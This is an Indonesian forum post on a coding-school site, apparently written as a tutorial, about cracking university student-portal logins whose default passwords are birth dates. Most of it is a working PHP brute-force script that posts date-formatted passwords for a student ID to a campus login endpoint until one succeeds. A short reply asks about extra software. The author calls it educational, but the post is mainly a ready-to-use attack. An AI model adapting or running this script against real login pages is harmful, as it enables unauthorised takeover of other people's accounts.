skodev mascot typing keyboard

SKO.DEV

sekolah koding rasa baru
icon gambar buku BELAJAR icon gambar pohon KOMUNITAS icon gambar buku ARTIKEL icon gambar masuk MASUK

Postingan lainnya

Membobol password yang menggunakan tanggal

Artikel ini hanya untuk pembelajaran berdasarkan contoh kasus di tempat kuliah sy dulu yg menerapkan sistem informasi akademik dengan password default tanggal lahir siswa yg diberikan oleh pengajaran.

Langkah 1 akses ke situs

Langkah 2 Melihat source webnya dengan mengklik view source pada browser, hal ini dilakukan untuk mencari variabel username dan password. Sy menggunakan contoh view source pada halaman login sekolah koding biar simpel ja saat menulis ini. Ketika telah mengetahui variabelNya lanjut langkah 3

Langkah 3

<?php
function post($host,$query,$others='')
{
$path=explode('/',$host);
$host=$path[0];
unset($path[0]);
$path='/'.(implode('/',$path));
$post="POST $path HTTP/1.1\r\nHost: $host\r\nContent-type: application/x-www-form-urlencoded\r\n${others}User-Agent: Mozilla 4.0\r\nContent-length: ".strlen($query)."\r\nConnection: close\r\n\r\n$query";
$h=fsockopen($host,80);
fwrite($h,$post);
for($a=0,$r='';!$a;)
{
$b=fread($h,8192);
$r.=$b;
$a=(($b=='')?1:0);
}
fclose($h);
return $r;
}
?>
<HTML>
<HEAD>
<TITLE>: : PASSWORD TEST : :</TITLE>
</HEAD>
<BODY>
<?php
// Ganti tanggal awal dan akhir test password
$awal="25/5/1984";
$akhir="28/5/1984";
// Pecah menjadi tanggal, bulan dan tahun
$oarr=explode("/", $awal);
$tawal=$oarr[2];
$bawal=$oarr[1];
$hawal=$oarr[0];
$oarr=explode("/", $akhir);
$takhir=$oarr[2];
$bakhir=$oarr[1];
$hakhir=$oarr[0];
//Url data akan dikirim contoh : host/dir/file... >> test.com/contoh/coba.jsp
$urltarget="kampusgue.ac.id/ceceklog.php"; //klw pada gambar source code SK di atas sesuai dengan action fromNya yaitu



// Set variabel tgl text awal
$tgl="00/00/00";
// Test!!!
while($tgl!=$akhir)
{
$hf=(strlen($hawal)>1 ? $hawal : "0".$hawal);
$bf=(strlen($bawal)>1 ? $bawal : "0".$bawal);
$passtest=$tawal."-".$bf."-".$hf; // format passwordnya YYYY-MM-DD
$datatest=post($urltarget ,"user=123456&pass=".$passtest."&aksi=Login"); // Tampung headernya...
if(substr_count($datatest, "index_mhs.php")>0) // PASSWORD OK
{
echo "COBA PASSWORD : <B>".$passtest."</B> HASIL : <B>BERHASIL</B><BR>\n</BODY>\n</HTML>";
exit;
}else{ // BUKAN PASSWORD
echo "COBA PASSWORD : <B>".$passtest."</B> HASIL : <B>GAGAL</B><BR>\n";
}
$tgl=$hawal."/".$bawal."/".$tawal; // Biar ngga loop trus menerus
// matematika untuk tanggal
if($hawal>30)
{
if($bawal>11)
{
$tawal+=1;
$bawal=0;
}
$bawal+=1;
$hawal=0;
}
$hawal+=1;
}
?>
</BODY>
</HTML>

Done!! user 123456 adalah username/nim yg diberikan oleh pengajaran jg dan variabel $passtest adalah variabel yg kita isikan dengan password baru yg kita inginkan. :D

Sekian dan terima kasih

php sharing
avatar darkside
@darkside

107 Kontribusi 54 Poin

Dipost 7 tahun yang lalu

1 Jawaban:

itu perlu aplikasi tambahan?

avatar Dank
@Dank

3 Kontribusi 0 Poin

Dipost 7 tahun yang lalu

Login untuk ikut Jawaban